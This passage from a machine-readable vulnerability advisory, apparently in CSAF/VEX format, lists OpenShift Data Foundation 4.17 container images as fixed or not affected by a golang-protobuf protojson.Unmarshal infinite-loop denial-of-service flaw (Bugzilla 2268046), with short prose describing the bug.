"9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:e35426de9ea6419f4981d8c6861867fc3eadcde4e41757b9a8f1ed4f2fa00dc9_s390x", "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:78656a47235af49c9a7bc75d9729987edf39a77077a3f478f5b46658df18878a_amd64", "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:92544e943e160d8fce1a9710a9d67ca4ccb795ff846edf7717d1e52835899202_ppc64le", "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:9615793800efca765c5ae588e0547e4e18bdfe264c8a92303fbbc39276c74580_s390x", "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:d6e30344ec1d541b6791b0e58cb48f4f3f492069ff8392005e8d1f16350c80e2_arm64", "9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:7bc24afafec3a0896c887d7eeeca47eb6f0cb12e35c62aa212ce55210cb1512d_amd64", "9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:93b238c24a3623bd635e162caa9a30ad7158db25eb83b545e9b365db0f769161_ppc64le", "9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:fb6507b95b53b19d90b82c3ac2a3b0264ebbdb9d4a8ceff3006e8a446a1cef49_s390x", "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:22b568f083c7563ffbb8d23807837a0f78cedeb156cffe9110906f3b6e0c70fb_arm64", "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:50f66564131a5b2b695582956c80515d7eea64d1c009479665937c97a76e2348_ppc64le", "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:a27c28ecf714cc248323a35eb58daec2aa611a318f0e61eb0defe0eaa80eb2f4_amd64", "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:bee14d945af0620ad1666e67be750324a1814cbf573256c1c88521e18f9877f7_s390x", "9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:71b79ea2f0356740a0e53e89a0422f8da608dd43337dd07dfcbadc9f9d8a8884_amd64", "9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:729fdaad48dfca53af4b3bf9bbf3cbf9dd25d5c50ddcbac03d0e8738aeb997cc_s390x", "9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:ed0d44fd0215cd299b4929617fa1f05ea31c6ee3cc078fbf6cc884e02a59beee_ppc64le", "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:1d189e8c4dfcc998d5887e1c5f06e874fa0beed29bc8f87f279299d58124a505_arm64", "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:5f92812a17a6637280387a3033865d8bd13ee8d6506f8e17489cefb79c53f58e_amd64", "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:7eba9da5ba5071b411bc99d33eee04e3f4530516ad984524920de542629e9b55_ppc64le", "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:f8c6007e32c54ffe0597952ae6eb1d38435188d605f3995ec785dff43da4257d_s390x", "9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:824823d527bdbbdd2abb773e054c12b41243e15467ada76689af4fdd6fae894a_s390x", "9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:9521eae22f7669dea4b31841d7cfe11e5d92155b11785afb2977cea9c5d917dc_ppc64le", "9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:a94961fd2c5aea06922c9c365c3a6296abf073e09a520f190a45f687cabc7b1d_amd64", "9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:26503c487a93ad520e1953ccad9200be808bc93648db90eaba3a73a340483541_ppc64le", "9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:78f3e869e50bd0e69d8e6efc6e6de357aadcc06ac3659d6ec7a053cda11be88b_amd64", "9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:fb473ae152002d124ff662e94ca9bf68f8f6a4c61c40d4f2929a55ef1c25cd20_s390x", "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:0bb022ca33965fb0f9de7df36f15377a33c90d873050dcbd763370ac1f06295a_s390x", "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:1070f8191e3ead7781876ed4d84ac5c5eeb54a1fa4d2c40701ebf393d345111c_ppc64le", "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:8dbdc5fb2b8d4551e5896f65654b3dae8a5164c12b1e1ec6d7fdda348a7b8c7d_arm64", "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:e7afe93fc1d88c385edc3d8ab3173e7bfb4a4f890d371836d5d2f72a2eb4abb5_amd64", "9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:147c2497071460ba266fc5ef0768d82edb6be9d7ffaa0c514e49308cf8017e7a_ppc64le", "9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:28fd2ef06dbf379ad4204877a3492933a731f2bc1d6dd7fc1600f52a3dc3ca47_amd64", "9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:6616912ec376e6993346b38bf637eb47d7a00aa9f58120899470c8353be02a0e_s390x", "9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:60f6533b7262bbfad59c5e14dff71878d3ea501c3b46194155ce53bc43a119e4_amd64", "9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:664c467321c9a5c3fec9d4fd85e16ab50677684b480cd1f346638f794ee7357c_s390x", "9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:b14752e1e9e6b004429f3c36dbaf4ec4d36d22ab9ac84c2d5158e8fbdfb214dd_ppc64le", "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:3472c7c043b318c2569e8a900527b13d052f1860082dba13723514795cedeec0_ppc64le", "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:54828ef99fc8d8fa3801c2ea0338a56f382018e4ae1a800dcd328fe43f7149be_arm64", "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:54a164ce15d25597fa3939709acbe467f728ce4f4165771a685fc507edfb92a3_s390x", "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:cfa36a55dc542e3e1332a55a59588a753f80e32d905847e51efdd1478fd58f0b_amd64", "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:0e2a71ed4eaa44f786428e18e01d90d3b0384169c78c5654e2ebbaac3a5ee2a4_ppc64le", "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:8046b84915034f60a5e5e349b001f04b713b3aa71ced136390c5086e0c351dd4_amd64", "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:9cbf21dad9ed5738ae1feb112707af3e74e02784795addf07ee4228bbd22e932_s390x", "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:a42d48b82e34f1f7cb731c3bdd25e81dc5ff3a61a3ca0b8b5eecefb5e2218be0_arm64", "9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:89cc7f0d6adb957e0f3adbdb2c023d4a6dda89e388a94d0b4015e0853971075e_ppc64le", "9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:917e625bfea670e543f857cf7cea31380b76ceac862bee61cc490cebabd23081_amd64", "9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:b1ba270980579090845909bb4f1e8a7b98ce8816c7c5ea60903432d138d29310_s390x", "9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:2be1d5ad630b9e91f30e0c82cfee52231d095cee87908949170e40a39f4ed814_ppc64le", "9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:37ec39720b1ce9701630635f158ad20414b1cda335b15b11526a7838ed189a54_s390x", "9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:7c59771279f5227246a941925160ca2f9fc169bd13972ab68a476e62308707e1_amd64", "9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:328ddae72c795012c7671c214d9a84d539264f8fe855d1a9e2dbb74590e72076_s390x", "9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:99d8b3aedcc57f57716bba144b991f7f223cdcc47ec37903c85aa20df295b3d4_amd64", "9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:f3f28074884a29b5d28f4535af6489f1ca8326dd60689c4bc8c862277dcb6e22_ppc64le", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:12e2b71cea2c63fb14363334287f5affa4ff3dc84f24dd51b5f57ba6a751c2da_amd64", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:7fa969e6714e0c3851f30999df5c823cd5738f28e1b2f6c06d940541c6edad4e_s390x", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:a0ac08a8a3ee9155338182d47bf55595a78aec3811c70f3fedb2ed461aad3319_arm64", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:b96b09407708601d04abb6a90d16f6f1260839534d64238b6aa4c7a5f458a6a4_ppc64le", "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:02e65965166ec9794f11b663de59671f159f8b2fef4d56ee5589b26bef342168_s390x", "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:322bae96941ede565a681ad98fc287f442f36888e0ed2b5ec4b309c702c7488b_amd64", "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:6e44cf5a814ceb7fea6ef925f6381a279837ebe2baf2980f4937e0c752afa5e2_arm64", "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:7a206b9fe0e540674fc9ec97b338607e61b8bfd3bfe30855835d0a940ca9304c_ppc64le", "9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:25052271f038b691ef973ac5a9fc02eee015a0427e087a5a390f1e31f7823d79_ppc64le", "9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:3342a17a1afca419dbfbff815261e91cdf8dcf0eecaf5a25a1713a39f3f95bf4_amd64", "9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:df597ffd1b0d14d394e39b1d92fc90797bea5386a390450193d99f7db5bc377c_s390x", "9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:883ba750931a93d30ff1dd3ed78592940a0079640da3d79400261f43fbecb69f_s390x", "9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:baf554d45b1fb4b38b264145809c10c7733120104bc4d8bd9e1ecb0c428db382_ppc64le", "9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:c05b5597918214f845c7243b7407b6cc3c88f644eec504585bd411727376b898_amd64", "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:6978d438b80f8fd7572c792155c2f86cc6fa55ff0b8cb1d45bbe04e42d185fe3_ppc64le", "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:7c09fb5c685be2a3029d02a35417e681f3b034269d1ac3014c1c5cdd2e035e61_s390x", "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:8ccd7099f174842dab551c27a55d822cfb12d8ba26c3528f605697cbfbbf8e70_amd64", "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:d0a1a2f77001e06cdb650b857433d6eebeb53eb5337354c8a042003db80387db_arm64", "9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:01d80d9fc9cbc3f3fecab4716bde805ad97b1fbcd4942ecbb07eab9fb4714012_s390x", "9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:6e3b814a41abf41ec9cdb5d71aafc79a086fc37f2986a3fd74f75341a4af91a2_amd64", "9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:f8e5b7818849a95ca57347496baa35507ce634c645643303205309f55572db7d_ppc64le", "9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:0d5aa39387a341a497a0cbc8d18c0e1e050e118b08243f5d8395ffe7394cc5f1_amd64", "9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:26541764bf0b79a4cc87600d1a1981a247d7678f9a8c37af62e80f22213159a7_s390x", "9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:75a85b98bcfa527709b8b1f16694a8bf68d5ea84a66b73baf5fea927df6e2904_ppc64le", "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:37af72217b81a8a7b0d968ec09a396f1840155f2a472eaa68927281f080d137f_amd64", "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:70ff7d9b8f6fb97fbe72768ed97519cd9e2b60dedbe1133d17fd0e317079ab3f_ppc64le", "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:9d7f8b892351de60609c30d187c5547ba4bec3be2dadd0e6d8ded2c4f3c1e79e_s390x", "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:f94cd1be8e371e8c85062be3e4475157cb628d339c1716bf96167e02703edf97_arm64", "9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:1b641a6aa2c4b1bc79ab0188c56f533fd89459be71b2b34f794faebaa66fd1f5_s390x", "9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:1e2ebbe9f71a03bfc6a0bd90f786293d9eec473ba2d570c8662a7f8d03dcc1b4_ppc64le", "9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:40d75cfa1eb657512dc4da888a5bb793a3ef3d6726665bc9ad7009cdd4166a1f_amd64", "9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:22c88c1f6be208bc0a5f0053f99ea728b9e457e150b4236a04304810270f1f80_ppc64le", "9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:50d04e71ae52f1a246d1509c5f2abbcb2f2bb2209090526b3357b8012b4b67d5_s390x", "9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:d7e8549c1a5cabd7324c589eadf9ccebccc1abbfb69d47826baaeaebc283c6a3_amd64", "9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:0223d74679590c8a5fbd34f3d793c05ec671ecb406b2055166bd54f09f75bbda_amd64", "9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:137a8a07adae2c0bb5fd1ac2a5823ffd85abe1035512a04e112e55b0aa3dc163_ppc64le", "9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:987ed8aa1347a831f61a4d65011f5bd00a700c65f6e7fa669ff3f38131425705_s390x", "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:2f414dc954bca2cd17f0bbabea11a8f18437eb417c6266d8c4750ba96957fc87_amd64", "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:bf140f64657478a7f94bacd6784f7b7727d5df9ae8eb4c526f86d5533bff06ae_arm64", "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:d9c38fe43617f214fea848ef7124d77f30358e2049390fc3bd3526986ff9ebbb_s390x", "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:fc251ea3c441bd0d3e358969fb6730bb9e53e340da9eff8bb6a173a37116c943_ppc64le", "9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:1055afb10a6ce469d2c77337878f510b29375a830f14505042da8a6d6081c438_amd64", "9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:5df96c3b3dc8cdad2c8b42fd9378dc55779cdb11f64eea5fa653101505d4d497_s390x", "9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:7cb791603d9d7c8c1c8e5200f96401ad0fadc5db14ad698e7a9519d046d0fdd0_ppc64le", "9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:7488149277a76efe188086d283fa2acf732a4eca8bdeaa4de8744204876a77a2_amd64", "9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:b89943771e55457bd3765efd5f3e6e6697953ee9e5c7bd123921a274b79536d3_ppc64le", "9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:cf89aaa1ad0614707748c0ab0b26ee40855053b0f4932cd5edaa8ccf8b1470e7_s390x", ], }, ], ids: [ { system_name: "Red Hat Bugzilla ID", text: "2268046", }, ], notes: [ { category: "description", text: "A flaw was found in Golang's protobuf module, where the unmarshal function can enter an infinite loop when processing certain invalid inputs. This issue occurs during unmarshaling into a message that includes a google.protobuf.Any or when the UnmarshalOptions.DiscardUnknown option is enabled. This flaw allows an attacker to craft malicious input tailored to trigger the identified flaw in the unmarshal function. By providing carefully constructed invalid inputs, they could potentially cause the function to enter an infinite loop, resulting in a denial of service condition or other unintended behaviors in the affected system.", title: "Vulnerability description", }, { category: "summary", text: "golang-protobuf: encoding/protojson, internal/encoding/json: infinite loop in protojson.Unmarshal when unmarshaling certain forms of invalid JSON", title: "Vulnerability summary", }, { category: "general", text: "The CVSS score(s) listed for this vulnerability do not reflect the associated product's status, and are included for informational purposes to better understand the severity of this vulnerability.", title: "CVSS score applicability", }, ], product_status: { fixed: [ "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:0810e85e929ad83a8593eab74a312b9c49ec94ea9833a37b7f06bca87ca9647b_ppc64le", "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:54cec6c71192cc9cb6c2bbcd812a5dcccd4905d5d7e822b4012622bb235fe75c_arm64", "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:66de77eb933a0fb4e0d98d2c1326212d494f6c3aa2e235f27f2a641fb31ff4af_s390x", "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:941371cee3ee7dd127d5663b7e1bcb39c6565031c11fb508f07c40f37aaee4d1_amd64", ], known_not_affected: [ "9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:2b9e511b21d4fefe8450f014962f2450db3e64af07f5e6e4bbfdaafafdfdc1f4_ppc64le", "9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:9a822fddffde8f67711c5025a89e003341011e0b8145cfd5b840849cabbe68a0_amd64", "9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:e35426de9ea6419f4981d8c6861867fc3eadcde4e41757b9a8f1ed4f2fa00dc9_s390x", "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:78656a47235af49c9a7bc75d9729987edf39a77077a3f478f5b46658df18878a_amd64", "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:92544e943e160d8fce1a9710a9d67ca4ccb795ff846edf7717d1e52835899202_ppc64le", "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:9615793800efca765c5ae588e0547e4e18bdfe264c8a92303fbbc39276c74580_s390x", "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:d6e30344ec1d541b6791b0e58cb48f4f3f492069ff8392005e8d1f16350c80e2_arm64", "9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:7bc24afafec3a0896c887d7eeeca47eb6f0cb12e35c62aa212ce55210cb1512d_amd64", "9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:93b238c24a3623bd635e162caa9a30ad7158db25eb83b545e9b365db0f769161_ppc64le", "9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:fb6507b95b53b19d90b82c3ac2a3b0264ebbdb9d4a8ceff3006e8a446a1cef49_s390x", "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:22b568f083c7563ffbb8d23807837a0f78cedeb156cffe9110906f3b6e0c70fb_arm64", "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:50f66564131a5b2b695582956c80515d7eea64d1c009479665937c97a76e2348_ppc64le", "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:a27c28ecf714cc248323a35eb58daec2aa611a318f0e61eb0defe0eaa80eb2f4_amd64", "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:bee14d945af0620ad1666e67be750324a1814cbf573256c1c88521e18f9877f7_s390x", "9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:71b79ea2f0356740a0e53e89a0422f8da608dd43337dd07dfcbadc9f9d8a8884_amd64", "9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:729fdaad48dfca53af4b3bf9bbf3cbf9dd25d5c50ddcbac03d0e8738aeb997cc_s390x", "9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:ed0d44fd0215cd299b4929617fa1f05ea31c6ee3cc078fbf6cc884e02a59beee_ppc64le", "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:1d189e8c4dfcc998d5887e1c5f06e874fa0beed29bc8f87f279299d58124a505_arm64", "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:5f92812a17a6637280387a3033865d8bd13ee8d6506f8e17489cefb79c53f58e_amd64", "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:7eba9da5ba5071b411bc99d33eee04e3f4530516ad984524920de542629e9b55_ppc64le", "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:f8c6007e32c54ffe0597952ae6eb1d38435188d605f3995ec785dff43da4257d_s390x", "9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:824823d527bdbbdd2abb773e054c12b41243e15467ada76689af4fdd6fae894a_s390x", "9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:9521eae22f7669dea4b31841d7cfe11e5d92155b11785afb2977cea9c5d917dc_ppc64le", "9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:a94961fd2c5aea06922c9c365c3a6296abf073e09a520f190a45f687cabc7b1d_amd64", "9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:26503c487a93ad520e1953ccad9200be808bc93648db90eaba3a73a340483541_ppc64le", "9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:78f3e869e50bd0e69d8e6efc6e6de357aadcc06ac3659d6ec7a053cda11be88b_amd64", "9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:fb473ae152002d124ff662e94ca9bf68f8f6a4c61c40d4f2929a55ef1c25cd20_s390x", "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:0bb022ca33965fb0f9de7df36f15377a33c90d873050dcbd763370ac1f06295a_s390x", "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:1070f8191e3ead7781876ed4d84ac5c5eeb54a1fa4d2c40701ebf393d345111c_ppc64le", "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:8dbdc5fb2b8d4551e5896f65654b3dae8a5164c12b1e1ec6d7fdda348a7b8c7d_arm64", "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:e7afe93fc1d88c385edc3d8ab3173e7bfb4a4f890d371836d5d2f72a2eb4abb5_amd64", "9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:147c2497071460ba266fc5ef0768d82edb6be9d7ffaa0c514e49308cf8017e7a_ppc64le", "9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:28fd2ef06dbf379ad4204877a3492933a731f2bc1d6dd7fc1600f52a3dc3ca47_amd64", "9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:6616912ec376e6993346b38bf637eb47d7a00aa9f58120899470c8353be02a0e_s390x", "9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:60f6533b7262bbfad59c5e14dff71878d3ea501c3b46194155ce53bc43a119e4_amd64", "9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:664c467321c9a5c3fec9d4fd85e16ab50677684b480cd1f346638f794ee7357c_s390x", "9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:b14752e1e9e6b004429f3c36dbaf4ec4d36d22ab9ac84c2d5158e8fbdfb214dd_ppc64le", "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:3472c7c043b318c2569e8a900527b13d052f1860082dba13723514795cedeec0_ppc64le", "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:54828ef99fc8d8fa3801c2ea0338a56f382018e4ae1a800dcd328fe43f7149be_arm64", "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:54a164ce15d25597fa3939709acbe467f728ce4f4165771a685fc507edfb92a3_s390x", "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:cfa36a55dc542e3e1332a55a59588a753f80e32d905847e51efdd1478fd58f0b_amd64", "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:0e2a71ed4eaa44f786428e18e01d90d3b0384169c78c5654e2ebbaac3a5ee2a4_ppc64le", "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:8046b84915034f60a5e5e349b001f04b713b3aa71ced136390c5086e0c351dd4_amd64", "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:9cbf21dad9ed5738ae1feb112707af3e74e02784795addf07ee4228bbd22e932_s390x", "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:a42d48b82e34f1f7cb731c3bdd25e81dc5ff3a61a3ca0b8b5eecefb5e2218be0_arm64", "9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:89cc7f0d6adb957e0f3adbdb2c023d4a6dda89e388a94d0b4015e0853971075e_ppc64le", "9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:917e625bfea670e543f857cf7cea31380b76ceac862bee61cc490cebabd23081_amd64", "9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:b1ba270980579090845909bb4f1e8a7b98ce8816c7c5ea60903432d138d29310_s390x", "9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:2be1d5ad630b9e91f30e0c82cfee52231d095cee87908949170e40a39f4ed814_ppc64le", "9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:37ec39720b1ce9701630635f158ad20414b1cda335b15b11526a7838ed189a54_s390x", "9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:7c59771279f5227246a941925160ca2f9fc169bd13972ab68a476e62308707e1_amd64", "9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:328ddae72c795012c7671c214d9a84d539264f8fe855d1a9e2dbb74590e72076_s390x", "9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:99d8b3aedcc57f57716bba144b991f7f223cdcc47ec37903c85aa20df295b3d4_amd64", "9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:f3f28074884a29b5d28f4535af6489f1ca8326dd60689c4bc8c862277dcb6e22_ppc64le", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:12e2b71cea2c63fb14363334287f5affa4ff3dc84f24dd51b5f57ba6a751c2da_amd64", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:7fa969e6714e0c3851f30999df5c823cd5738f28e1b2f6c06d940541c6edad4e_s390x", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:a0ac08a8a3ee9155338182d47bf55595a78aec3811c70f3fedb2ed461aad3319_arm64", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:b96b09407708601d04abb6a90d16f6f1260839534d64238b6aa4c7a5f458a6a4_ppc64le", "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:02e65965166ec9794f11b663de59671f159f8b2fef4d56ee5589b26bef342168_s390x", "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:322bae96941ede565a681ad98fc287f442f36888e0ed2b5ec4b309c702c7488b_amd64", "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:6e44cf5a814ceb7fea6ef925f6381a279837ebe2baf2980f4937e0c752afa5e2_arm64", "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:7a206b9fe0e540674fc9ec97b338607e61b8bfd3bfe30855835d0a940ca9304c_ppc64le", "9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:25052271f038b691ef973ac5a9fc02eee015a0427e087a5a390f1e31f7823d79_ppc64le", "9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:3342a17a1afca419dbfbff815261e91cdf8dcf0eecaf5a25a1713a39f3f95bf4_amd64", "9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:df597ffd1b0d14d394e39b1d92fc90797bea5386a390450193d99f7db5bc377c_s390x", "9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:883ba750931a93d30ff1dd3ed78592940a0079640da3d79400261f43fbecb69f_s390x", "9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:baf554d45b1fb4b38b264145809c10c7733120104bc4d8bd9e1ecb0c428db382_ppc64le", "9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:c05b5597918214f845c7243b7407b6cc3c88f644eec504585bd411727376b898_amd64", "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:6978d438b80f8fd7572c792155c2f86cc6fa55ff0b8cb1d45bbe04e42d185fe3_ppc64le", "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:7c09fb5c685be2a3029d02a35417e681f3b034269d1ac3014c1c5cdd2e035e61_s390x", "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:8ccd7099f174842dab551c27a55d822cfb12d8ba26c3528f605697cbfbbf8e70_amd64", "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:d0a1a2f77001e06cdb650b857433d6eebeb53eb5337354c8a042003db80387db_arm64", 